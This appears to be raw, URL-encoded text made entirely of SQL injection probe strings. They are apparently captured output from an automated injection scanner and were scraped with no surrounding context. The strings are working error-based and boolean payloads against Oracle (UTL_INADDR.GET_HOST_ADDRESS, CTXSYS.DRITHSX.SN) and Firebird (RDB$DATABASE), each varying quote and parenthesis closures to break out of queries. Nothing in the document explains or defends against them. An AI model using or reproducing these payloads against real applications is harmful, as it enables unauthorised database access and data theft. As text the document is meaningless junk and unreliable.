-7540%00%27%29%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%27Lxbl%27%3D%27Lxbl -5001%00%27%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%27RBsr%27%3D%27RBsr -2974%27%29%20WHERE%205699%3D5699%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 -5662%22%29%20WHERE%207069%3D7069%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 -4791%29%20WHERE%206550%3D6550%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 -4116%27%20WHERE%207588%3D7588%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 -2917%22%20WHERE%206870%3D6870%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 -1394%20WHERE%208640%3D8640%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 -5226%29%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29 -7722%27%29%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29 -9998%27%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29 -8046%22%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29 -4728%29%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%289584%3D9584 -2102%29%29%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%285981%3D5981 -9262%29%29%29%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%289966%3D9966 -2325%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29 -6175%27%29%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27LLwO%27%3D%27LLwO -7361%27%29%29%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27QSFN%27%3D%27QSFN -9575%27%29%29%29%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27hbbV%27%3D%27hbbV -1239%27%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%27zrEY%27%3D%27zrEY -4511%27%29%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27GSmh%27%20LIKE%20%27GSmh -6660%27%29%29%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27eoar%27%20LIKE%20%27eoar -5016%27%29%29%29%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27zkQa%27%20LIKE%20%27zkQa -7587%27%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%27WXfc%27%20LIKE%20%27WXfc -8024%22%29%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22pkbN%22%3D%22pkbN -2550%22%29%29%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22DtCj%22%3D%22DtCj -4750%22%29%29%29%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22unCH%22%3D%22unCH -3617%22%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%22vkrl%22%3D%22vkrl -7141%22%29%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22uejf%22%20LIKE%20%22uejf -8388%22%29%29%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22zeyM%22%20LIKE%20%22zeyM -7351%22%29%29%29%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22zhsG%22%20LIKE%20%22zhsG -4977%22%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%22DAdb%22%20LIKE%20%22DAdb -7700%25%27%29%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27%25%27%3D%27 -4946%25%27%29%29%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27%25%27%3D%27 -7256%25%27%29%29%29%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 -2216%25%27%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%27%25%27%3D%27 -2075%00%27%29%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27kuwH%27%3D%27kuwH -5405%00%27%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%27RbeZ%27%3D%27RbeZ -2169%27%29%20WHERE%203120%3D3120%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 -1954%22%29%20WHERE%202398%3D2398%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 -9242%29%20WHERE%208000%3D8000%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 -5379%27%20WHERE%209928%3D9928%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 -4563%22%20WHERE%208689%3D8689%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 -4169%20WHERE%204854%3D4854%20OR%201460%3DCTXSYS.DRITHSX.SN%281460%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281460%3D1460%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 -8890%29%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29 -7773%27%29%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29 -8299%27%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29 -7489%22%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29 -4627%29%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%284640%3D4640 -8615%29%29%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%284020%3D4020 -3737%29%29%29%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%28%285105%3D5105 -5756%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29 -7333%27%29%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%27SMcr%27%3D%27SMcr -1909%27%29%29%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%28%27PefR%27%3D%27PefR -6339%27%29%29%29%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%28%28%27ffyF%27%3D%27ffyF -2874%27%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%27BrOe%27%3D%27BrOe -4300%27%29%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%27bnIW%27%20LIKE%20%27bnIW -3520%27%29%29%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%28%27JFXd%27%20LIKE%20%27JFXd -2274%27%29%29%29%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%28%28%27WRnl%27%20LIKE%20%27WRnl -6711%27%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%27XFlz%27%20LIKE%20%27XFlz -5784%22%29%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%22roOR%22%3D%22roOR -9644%22%29%29%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%28%22mfFm%22%3D%22mfFm -6870%22%29%29%29%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%28%28%22AhSI%22%3D%22AhSI -4466%22%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%22rAeR%22%3D%22rAeR -3350%22%29%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%22XHKq%22%20LIKE%20%22XHKq -7885%22%29%29%20OR%201572%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201572%20WHEN%201572%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%28%22uSKP%22%20LIKE%20%22uSKP 